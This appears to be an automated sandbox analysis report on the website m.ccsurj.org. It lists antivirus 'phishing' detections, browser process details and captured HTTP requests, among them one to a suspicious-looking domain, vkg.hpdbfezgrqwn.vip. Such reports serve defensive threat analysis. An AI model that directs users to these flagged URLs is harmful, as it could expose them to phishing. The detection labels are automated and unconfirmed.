Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://m.ccsurj.org/

Overview

General Information

Sample URL:http://m.ccsurj.org/
Analysis ID:1589334
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain

Classification

  • System is w10x64
  • chrome.exe (PID: 5756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1976,i,7273462861023531778,15793530550184385695,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://m.ccsurj.org/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://m.ccsurj.org/Avira URL Cloud: detection malicious, Label: phishing
Source: https://www.ccsurj.org/__local/7/57/19/8893B54885AD47B81497E346099_E950D003_146A63.pngAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/sitegray/sitegray.jsAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/images/ico_tz.pngAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/images/tt_bg.pngAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/system/resource/js/calendar/simple.jsAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/style/style.cssAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/images/slider-arrow.pngAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/images/logo-xxgcxy.jpgAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/@public/js.jsAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/__local/F/3A/FA/D3291F0B28550FCE05C6FD5AA87_291DC08D_1634EF4.pngAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-1.jpgAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/js/jquery.jsAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-5.jpgAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/system/resource/js/vsbscreen.min.jsAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-4.jpgAvira URL Cloud: Label: phishing
Source: https://www.ccsurj.org/HTTP Parser: No favicon
Source: https://www.ccsurj.org/HTTP Parser: No favicon
Source: https://www.ccsurj.org/HTTP Parser: No favicon
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.131
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.131
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /style/style.css HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sitegray/sitegray_d.css HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.vsb.css HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/jquery.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/jquery.SuperSlide.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sitegray/sitegray.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/vsbscreen.min.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/counter.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@public/base.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/calendar/simple.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/jquery.SuperSlide.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sitegray/sitegray.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/vsbscreen.min.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/jquery.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico_search.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/style/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/logo-xxgcxy.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/base64.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/formfunc.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/counter.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@public/base.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/dynclicks.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/21/11/25/1p6vg4xelj/banner-5.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/calendar/simple.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/baidu_jgylogo3.gif HTTP/1.1Host: www.baidu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/index/images/logo_440x140.v.4.png HTTP/1.1Host: www.sogou.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/21/11/25/1p6vg4xelj/banner-2.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico_search.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/slider-arrow.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/style/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/tt_bg.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/style/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/base64.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/21/11/25/1p6vg4xelj/banner-1.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/formfunc.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /system/resource/js/dynclicks.js HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/logo-xxgcxy.jpg HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico_tz.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ccsurj.org/style/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/baidu_jgylogo3.gif HTTP/1.1Host: www.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wdzmr.php HTTP/1.1Host: vkg.hpdbfezgrqwn.vipConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/index/images/logo_440x140.v.4.png HTTP/1.1Host: www.sogou.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
